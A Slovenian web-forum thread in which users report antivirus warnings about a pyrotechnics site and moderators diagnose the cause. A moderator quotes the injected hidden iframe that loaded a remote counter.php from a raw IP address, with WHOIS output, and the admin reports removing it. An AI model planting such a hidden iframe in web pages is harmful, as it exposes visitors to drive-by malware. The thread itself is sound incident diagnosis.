Danes je Če nov 14, 2019 1:47 am

Časovni pas: UTC + 1 ura




Napiši novo temo Ta tema je zaklenjena - ne morete urejati prispevkov ali dodajati novih.  [ 10 prispevkov ] 
Avtor Sporočilo
 Naslov prispevka: Trojanski konj na piroraju ?
OdgovorObjavljeno: Ne maj 05, 2013 7:29 pm 
Odsoten

Pridružen: Ne maj 05, 2013 7:20 pm
Prispevkov: 1
Oj!

Zmeraj kadar kliknem ''Forum strani Pirotehnični Raj'' mi javi da je trojanski konj?!
Pred nekaj leti sem bil prijavljenna forumu, pa mi to ni nobenkrat pokazalo...

lp


Zadnjič spremenil Alkimisticus, dne Če dec 12, 2013 8:36 am, skupaj popravljeno 1 krat.
Spremenil naslov teme, ker je bil preveč splošen.


Na vrh
 Profil  
 
 Naslov prispevka: Re: Trojanski konj
OdgovorObjavljeno: To maj 21, 2013 3:44 pm 
Odsoten
Uporabniški avatar

Pridružen: To apr 09, 2013 3:41 pm
Prispevkov: 5
men tudi! pa sm z dvema antivirusama progledu, a obadva pravta da je trojanc :?


Na vrh
 Profil  
 
 Naslov prispevka: Re: Trojanski konj
OdgovorObjavljeno: So maj 25, 2013 2:22 am 
Odsoten

Pridružen: Ne mar 20, 2011 7:18 pm
Prispevkov: 540
Meni tudi. Ko grem na stran www.piroraj.org mi avast javi, da je stran blokirana, trojanec - 'HTML:IFrame-JS [Trj]'


Na vrh
 Profil  
 
 Naslov prispevka: Re: Trojanski konj
OdgovorObjavljeno: So maj 25, 2013 5:48 pm 
Odsoten

Pridružen: Ne mar 10, 2013 6:07 pm
Prispevkov: 37
meni tud to odpre


Na vrh
 Profil  
 
 Naslov prispevka: Re: Trojanski konj
OdgovorObjavljeno: So avg 03, 2013 11:15 pm 
Odsoten
Moderator
Uporabniški avatar

Pridružen: Pe okt 21, 2005 6:03 pm
Prispevkov: 2033
Kraj: tukej
men se tud dogaja..


Na vrh
 Profil  
 
 Naslov prispevka: Re: Trojanski konj
OdgovorObjavljeno: Ne avg 04, 2013 8:48 am 
Odsoten
Moderator
Uporabniški avatar

Pridružen: Če mar 11, 2010 2:15 pm
Prispevkov: 603
Na forumu jaz ničesar ne vidim. Na http://www.piroraj.org pa zgleda, da ima HTML stran noter en iframe element, ki vsebuje link na nek counter.
Koda:
<iframe src="http://216.70.86.59/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Po moje je to nek števec obiskov iz starih časov piroraja, samo očitno ta števec ni nikjer prikazan oz. je neviden. Trenutno kaže na eno ameriško spletno stran "Privelege dubai" ali nekaj takega. Bog ve kaj je to za ena stran.

Whois pokaže tole:
Citiram:
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#


#
# Query terms are ambiguous. The query is assumed to be:
# "n 216.70.86.59"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=216.7 ... xt=netref2
#

NetRange: 216.70.64.0 - 216.70.127.255
CIDR: 216.70.64.0/18
OriginAS:
NetName: MEDIATEMPLE-102
NetHandle: NET-216-70-64-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
RegDate: 2005-06-22
Updated: 2012-03-20
Ref: http://whois.arin.net/rest/net/NET-216-70-64-0-1

OrgName: Media Temple, Inc.
OrgId: MEDIAT-10
Address: 8520 National Blvd.
Address: Building B
City: Culver City
StateProv: CA
PostalCode: 90232
Country: US
RegDate: 2001-05-15
Updated: 2010-06-29
Ref: http://whois.arin.net/rest/org/MEDIAT-10

OrgAbuseHandle: ABUSE418-ARIN
OrgAbuseName: Abuse Desk
OrgAbusePhone: +1-877-578-4000
OrgAbuseEmail: abuse@mediatemple.net
OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE418-ARIN

OrgTechHandle: NA230-ARIN
OrgTechName: NOC Hosting Operations
OrgTechPhone: +1-877-578-4000
OrgTechEmail: dnsadmin@mediatemple.net
OrgTechRef: http://whois.arin.net/rest/poc/NA230-ARIN

RTechHandle: NA230-ARIN
RTechName: NOC Hosting Operations
RTechPhone: +1-877-578-4000
RTechEmail: dnsadmin@mediatemple.net
RTechRef: http://whois.arin.net/rest/poc/NA230-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#


Po mojem bi lahko admin tale iframe varno izbrisal s HTML strani.

lp


Na vrh
 Profil  
 
 Naslov prispevka: Re: Trojanski konj
OdgovorObjavljeno: Če avg 08, 2013 2:02 am 
Odsoten
Site Admin
Uporabniški avatar

Pridružen: Če dec 18, 2003 5:47 pm
Prispevkov: 372
Škodljiva koda odstranjena. Nevem kako se je tam pojavila. Preverjam log ftp dostopov do html datotek.

Upam, da je sedaj vse vredu.


Na vrh
 Profil  
 
 Naslov prispevka: Re: Trojanski konj
OdgovorObjavljeno: Ne avg 11, 2013 4:28 pm 
Odsoten
Moderator
Uporabniški avatar

Pridružen: Pe okt 21, 2005 6:03 pm
Prispevkov: 2033
Kraj: tukej
Men dela zdej normalno.. Upam da bo tud v prihodne..


Na vrh
 Profil  
 
 Naslov prispevka: Re: Trojanski konj
OdgovorObjavljeno: Sr okt 09, 2013 2:43 pm 
Odsoten
Moderator
Uporabniški avatar

Pridružen: Če mar 11, 2010 2:15 pm
Prispevkov: 603
Šefe, ali je že kaj novic kako je tale koda prišla gor? Zdaj sem malo bral tele novice o NSA vohunjenju in še enkrat pogledal, pa mi v FF javi, da je omenjena stran reported attack site. Pa niti odziva se ne več. Glede na to, da je nekdo spremenil html kodo potem je zelo verjetno imel tudi dostop do strežnika... in posledično vseh logov oz. naših IP naslovov. Se človek lahko malo zamisli.


Na vrh
 Profil  
 
 Naslov prispevka: Re: Trojanski konj
OdgovorObjavljeno: Sr okt 09, 2013 7:31 pm 
Odsoten

Pridružen: Ne mar 20, 2011 7:18 pm
Prispevkov: 540
najbolje da se problem vzame resno, če ne drugega, ker so lahko potem te podatki objavljeni in javno zlorabljeni(že prevečkrat videno tudi v Sloveniji..)...


Na vrh
 Profil  
 
Prikaži prispevke prejšnjih:  Razvrsti po  
Napiši novo temo Ta tema je zaklenjena - ne morete urejati prispevkov ali dodajati novih.  [ 10 prispevkov ] 

Časovni pas: UTC + 1 ura


Kdo je prisoten

Po forumu brska: 0 registriranih uporabnikov in 1 gost


Ne morete pisati prispevkov v temi
Ne morete odgovarjati na teme v forumu
Ne morete urejati prispevkov v temi
Ne morete brisati vaših prispevkov forumu
Ne morete dodati priponk prispevkom

Išči za:
Pojdi na:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group